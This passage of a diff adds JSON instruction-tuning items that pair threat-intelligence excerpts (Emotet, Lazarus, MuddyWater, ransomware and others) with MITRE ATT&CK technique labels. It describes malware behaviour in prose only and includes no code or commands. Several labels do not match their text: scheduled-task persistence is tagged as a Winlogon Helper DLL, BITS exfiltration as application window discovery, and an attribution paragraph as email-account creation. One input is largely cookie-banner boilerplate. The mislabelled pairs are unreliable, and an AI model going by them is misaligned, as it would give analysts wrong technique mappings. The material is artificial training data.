malware on the endpoint - Update itself on endpoint after a separate updater component downloads the update from the control server", + "output": "- T1070.004: Indicator Removal - File Deletion\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The sample collects the user information including current processes, installed software, system language and time zone. The harvested credentials and user information are then sent back to the C2. Here are some highlights about system information stealing", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Passgrabber module \u2013 collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In at least once case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication", + "output": "- T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Cloud Atlas implants utilize a rather unusual C&C mechanism. All the malware samples we\u2019ve seen communicate via HTTPS and WebDav with the same server \u201ccloudme.com\u201d, a cloud services provider. According to their website, CloudMe is owned and operated by CloudMe AB, a company based in Link\u00f6ping, Sweden", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These websites hosted malware that would be side-loaded with a legitimate signed executable. These tactics are becoming increasingly common by malware authors in order to evade security products and controls. Two variants of the malware employed by C0d0so0 were discovered\u2014one that used HTTP for command and control (C2) communications, and one that used a custom network protocol over port 22", + "output": "- T1132.001: Data Encoding - Standard Encoding\n- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Consent - Details - [#IABV2SETTINGS#] - About This website uses cookies . We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you\u2019ve provided to them or that they\u2019ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest\u00a0[x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email. Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit\u2019s shikata_ga_nai encoder \u2013 although it\u2019s available for everyone and couldn\u2019t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can\u00b4t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board", + "output": "- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Anchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to ensure that the dropper is deleted once the malware was successfully deployed", + "output": "- T1070.004: Indicator Removal - File Deletion\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After uploading these files, take advantage of the pre-built queries within BloodHound. Queries include: viewing all domain administrators; viewing users with the most local administrator rights; or viewing computers with the most administrative user access. One of these queries gives you the ability to map domain trusts, as shown in Figure 3", + "output": "- T1482: Domain Trust Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Recently, Falcon Intelligence observed new activity from MUSTANG PANDA, using a unique infection chain to target likely Mongolia-based victims. This newly observed activity uses a series of redirections and fileless, malicious implementations of legitimate tools to gain access to the targeted systems. Additionally, MUSTANG PANDA actors reused previously-observed legitimate domains to host files", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to circumvent the security measures they face during their attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies", + "output": "- T1585.002: Establish Accounts - Email Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon\u2019s operators", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers configured multiple C2 servers for various stages, reusing several scripts we\u2019ve seen in previous attacks by the group. Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus group campaigns", + "output": "- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"\"Blackwater.bas\"\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information\"", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Among the different files dropped by the latest versions of Ramsay we find a Spreader component. This executable will attempt to scan for network shares and removable drives excluding A: and B: drives", + "output": "- T1080: Taint Shared Content" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware", + "output": "- T1016: System Network Configuration Discovery\n- T1007: System Service Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Moving the (malicious) application into the /Users/user/Library/ directory 2) Executing this persisted copy, via the open command 3) Decrypting embedded strings that relate to file extensions of (likely) interest", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA505 has been responsible for many large-scale attacks since at least 2014, using malicious email campaigns to distribute various banking trojans, ransomware, RATs, and backdoors. TA505 has been focused on delivering downloaders, information stealers, and other malware \u2014 threats that can remain in affected systems if not prevented or remediated. With the group's use of email as an entry point for malicious activities, the threat has become more serious for unwitting users and organizations", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim\u2019s machine. Execute the command", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move latterly and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool from the Windows operating system. By the end of September 2019, we started seeing a new version of Guildma malware being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The BITS mechanism has existed since Windows XP up to the current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS itself. The following is the command used to exfiltrate data from the victim to the C2", + "output": "- T1010: Application Window Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NV.html, tracked by Microsoft as EnvyScout, can be best described as a malicious dropper capable of de-obfuscating and writing a malicious ISO file to disk. EnvyScout is chiefly delivered to targets of NOBELIUM by way of an attachment to spear-phishing emails", + "output": "- T1204.002: User Execution - Malicious File\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the idgenerator script and its output is sent to the C&C server by the updater.sh script", + "output": "- T1016: System Network Configuration Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros", + "output": "- T1204.002: User Execution - Malicious File\n- T1221: Template Injection\n- T1566.001: Phishing - Spearphishing Attachment\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration", + "output": "- T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The exported procedure HandlerW , responsible for parsing the arguments, shows that it is also possible to try to impersonate an anonymous token or try to steal another\u2019s process token just for the execution of a command", + "output": "- T1134.002: Access Token Manipulation - Create Process with Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator. Kazuar includes a highly functional command set, which includes the ability to remotely load additional plugins to increase the Trojan\u2019s capabilities. Also, we discovered a unique feature within Kazuar: it exposes its capabilities through an Application Programming Interface (API) to a built-in webserver", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Winnti malware handles outbound communications using multiple protocols including: ICMP, HTTP, as well as custom TCP and UDP protocols. Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports", + "output": "- T1071.001: Application Layer Protocol - Web Protocols\n- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Proxysvc appears to be a downloader whose primary capability is to deliver additional payloads to the endpoint without divulging the control address of the attackers. This implant is a service DLL that can also run as a standalone process", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id", + "output": "- T1490: Inhibit System Recovery\n- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor launched a series of reconnaissance commands to try to obtain and enumerate information about the compromised machine, network architecture, users, and active directory enumeration", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this wave of attacks, Emotet trojan spreads by emails that lure victims into downloading a Christmas-themed Word document, which contains a macro that executes a PowerShell script to download a malicious payload", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One of the file path name combinations observed was \u2018C:\\ProgramData\\Dacr\\macrse.exe\u2019, also configured in a Crimson \u201cMain Client\u201d sample and used for saving the payload received from the C2 when invoking the usbwrm command", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "On other websites, different cloud storage solutions such as Amazon S3 or Google Drive were used to host Windows, OSX, and Android malware payloads", + "output": "- T1608.001: Stage Capabilities - Upload Malware\n- T1102: Web Service\n- T1583.006: Acquire Infrastructure - Web Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Conclusion The DarkHydrus group carried out an attack campaign on at least one government agency in the Middle East using malicious .iqy files. The .iqy files take advantage of Excel's willingness to download and include the contents from a remote server in a spreadsheet. DarkHydrus leveraged this obscure file format to run a command to ultimately install a PowerShell scripts to gain backdoor access to the system. The PowerShell backdoor delivered in this current attack may have been custom developed by the threat group, however, it is possible that DarkHydrus pieced together this tool by using code from legitimate open source tools", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Spear phishing, including the use of probably compromised email accounts. Lure documents using CVE-2017-11882 to drop malware. Stolen code signing certificates used to sign malware. Use of bitsadmin.exe to download additional tools. Use of PowerShell to download additional tools. Using C:\\Windows\\Debug and C:\\Perflogs as staging directories. Using Windows Management Instrumentation (WMI) for persistence. Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence. Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework 